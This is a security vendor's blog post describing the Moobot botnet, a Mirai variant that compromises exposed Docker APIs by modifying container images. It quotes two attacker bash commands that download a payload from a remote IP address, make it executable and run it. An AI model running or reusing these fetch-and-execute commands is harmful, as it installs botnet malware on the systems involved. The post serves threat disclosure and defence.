Lacework tracks Moobot: botnet that targets vulnerable Docker APIs

Security Report News October 22, 2020 2 min read

There is an abundance of Mirai-based botnets in the wild however “Moobot”, which targets vulnerable Docker APIs, recently showed up on our radar. This blog describes Moobot development along with the malware variant details. A full indicator list is also provided in our GitHub repository.

As early as September 20th, one of these variants belonging to DDOS botnet Moobot, was used as the payload in a campaign targeting vulnerable docker APIs. After identifying vulnerable APIs, Moobot would modify an existing image to run a cron job and download Mirai . Currently only one provider, a US based ISP, appears to be affected by this activity however Moobot was successful in compromising over 10% of their docker deployments.

Note: “Mirai” refers to the source code behind the IOT botnet that has historically targeted vulnerable routers, IP cameras, and DVRs with a suite of exploits. In 2016, the Mirai source code was released and unsurprisingly a massive increase in attacks followed.

Figure 1. Modified Image

Going by the image name, the original container was likely intended for speed testing. After modification, the image is renamed to either /test1, or /test2 and one of two commands executed:

/bin/bash -c ‘apt-get update && apt-get install -y wget cron;service cron start; wget 45.63.53.4/arm7;chmod +x arm7;./arm7;tail -f /dev/null’

/bin/bash -c ‘apt-get update && apt-get install -y wget cron;service cron start; wget 45.14.148.105/k.sh;sh k.sh;tail -f /dev/null’

The arm7 payload from the first wget was identified as the Moobot Mirai-variant.